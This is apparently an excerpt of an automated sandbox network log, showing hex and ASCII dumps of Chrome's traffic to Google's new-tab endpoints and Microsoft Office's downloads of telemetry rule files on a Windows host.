Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-07 11:59:22 UTC	124	IN	Data Raw: 32 66 35 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 72 61 76 65 6e 73 20 64 69 6f 6e 74 61 65 20 6a 6f 68 6e 73 6f 6e 22 2c 22 73 75 62 61 72 75 20 72 65 6c 69 61 62 69 6c 69 74 79 22 2c 22 73 74 6f 72 6d 20 64 61 72 72 61 67 68 20 77 65 61 74 68 65 72 20 77 61 72 6e 69 6e 67 73 22 2c 22 6d 61 72 76 65 6c 20 72 69 76 61 6c 73 20 63 68 61 72 61 63 74 65 72 73 20 72 6f 6c 65 Data Ascii: 2f5)]}'["",["ravens diontae johnson","subaru reliability","storm darragh weather warnings","marvel rivals characters role
2024-12-07 11:59:22 UTC	640	IN	Data Raw: 73 22 2c 22 6d 61 6a 69 6e 20 62 75 75 20 76 73 20 6d 61 6a 69 6e 20 6b 75 75 22 2c 22 75 6e 65 6d 70 6c 6f 79 6d 65 6e 74 20 6a 6f 62 73 20 72 65 70 6f 72 74 22 2c 22 61 70 70 6c 65 20 69 6f 73 20 31 38 2e 32 22 2c 22 68 6f 6c 6d 65 73 20 6e 79 20 6d 65 74 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 64 65 74 61 69 6c 22 3a 5b 7b Data Ascii: s","majin buu vs majin kuu","unemployment jobs report","apple ios 18.2","holmes ny mets"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{
2024-12-07 11:59:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49716	142.250.181.68	443	7580	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:21 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49714	142.250.181.68	443	7580	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:21 UTC	498	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-07 11:59:22 UTC	1018	IN	HTTP/1.1 200 OK Version: 702228742 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sat, 07 Dec 2024 11:59:22 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-07 11:59:22 UTC	372	IN	Data Raw: 32 31 33 36 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 2136)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-12-07 11:59:22 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2024-12-07 11:59:22 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2024-12-07 11:59:22 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2024-12-07 11:59:22 UTC	1390	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2024-12-07 11:59:22 UTC	1390	IN	Data Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 33 31 2c 33 37 30 31 33 38 34 2c 31 30 32 31 31 38 39 33 39 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700331,3701384,102118939],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){var window
2024-12-07 11:59:22 UTC	1188	IN	Data Raw: 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 49 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 48 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4b 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 Data Ascii: Array(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Id\u003dfunction(a){return new _.Hd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Jd\u003dglobalThis.trustedTypes;_.Kd\u003dclass{constructor(a){this
2024-12-07 11:59:22 UTC	505	IN	Data Raw: 31 66 32 0d 0a 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 5c 75 30 30 32 36 5c 75 30 30 32 36 28 54 64 5c 75 30 30 33 64 53 64 28 29 29 3b 72 65 74 75 72 6e 20 54 64 7d 3b 5c 6e 5f 2e 57 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 5f 2e 55 64 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 56 64 28 62 3f 62 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 61 29 3a 61 29 7d 3b 5f 2e 58 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 56 64 29 72 65 74 75 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 59 Data Ascii: 1f2\u003d\u003d\u003dvoid 0\u0026\u0026(Td\u003dSd());return Td};\n_.Wd\u003dfunction(a){const b\u003d_.Ud();return new _.Vd(b?b.createScriptURL(a):a)};_.Xd\u003dfunction(a){if(a instanceof _.Vd)return a.i;throw Error(\"F\");};_.Zd\u003dfunction(a){if(Y
2024-12-07 11:59:22 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 62 2e 6e 6f 6e 63 65 7c 7c 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e 50 61 28 61 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 72 72 61 79 5c 22 7c 7c 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6f 62 6a 65 63 74 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f Data Ascii: 8000.querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\":b.nonce\|\|b.getAttribute(\"nonce\")\|\|\"\"};\n_.be\u003dfunction(a){var b\u003d_.Pa(a);return b\u003d\u003d\"array\"\|\|b\u003d\u003d\"object\"\u0026\u0026typeo
2024-12-07 11:59:22 UTC	1390	IN	Data Raw: 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 6c 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 64 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6c 65 5b 64 5d 2c 63 29 3a 5f 2e 67 65 28 64 2c 5c 22 61 72 69 61 2d 5c 22 29 7c 7c 5f 2e 67 65 28 64 2c 5c 22 64 61 74 61 2d 5c 22 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 64 2c 63 29 3a 61 5b 64 5d 5c 75 30 30 33 64 63 7d 29 7d 3b 6c 65 5c 75 30 30 33 64 7b 63 65 6c 6c 70 61 64 64 69 6e 67 3a 5c 22 63 65 6c 6c 50 61 64 64 69 6e 67 5c 22 2c 63 65 6c 6c 73 70 61 63 69 6e 67 3a 5c 22 63 65 6c 6c 53 70 61 63 69 6e 67 5c 22 2c 63 6f 6c 73 70 61 6e 3a 5c 22 63 6f 6c 53 70 61 6e 5c 22 2c 66 72 61 6d 65 62 6f 72 64 65 72 3a 5c 22 66 72 61 6d 65 42 6f Data Ascii: d\u003d\"for\"?a.htmlFor\u003dc:le.hasOwnProperty(d)?a.setAttribute(le[d],c):_.ge(d,\"aria-\")\|\|_.ge(d,\"data-\")?a.setAttribute(d,c):a[d]\u003dc})};le\u003d{cellpadding:\"cellPadding\",cellspacing:\"cellSpacing\",colspan:\"colSpan\",frameborder:\"frameBo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49719	142.250.181.68	443	7580	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:21 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-07 11:59:22 UTC	933	IN	HTTP/1.1 200 OK Version: 702228742 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sat, 07 Dec 2024 11:59:22 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-07 11:59:22 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-07 11:59:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.7	49722	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:23 UTC	192	OUT	GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:23 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:23 GMT Content-Type: text/xml Content-Length: 467 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6C038BC" x-ms-request-id: c4bc35ba-101e-007a-7206-48047e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115923Z-r1cf579d778d5zkmhC1EWRk6h800000002pg000000003xk6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:23 UTC	467	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.7	49723	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:23 UTC	192	OUT	GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:23 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:23 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBAD04B7B" x-ms-request-id: b569e8fb-501e-008c-5305-48cd39000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115923Z-r1cf579d778qgtz2hC1EWRmgks0000000210000000003n8z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:23 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.7	49724	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:23 UTC	192	OUT	GET /rules/rule120616v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:23 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:23 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB344914B" x-ms-request-id: 3fcfbabf-e01e-0052-0903-48d9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115923Z-r1cf579d778x776bhC1EWRdk8000000002b0000000001yrt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
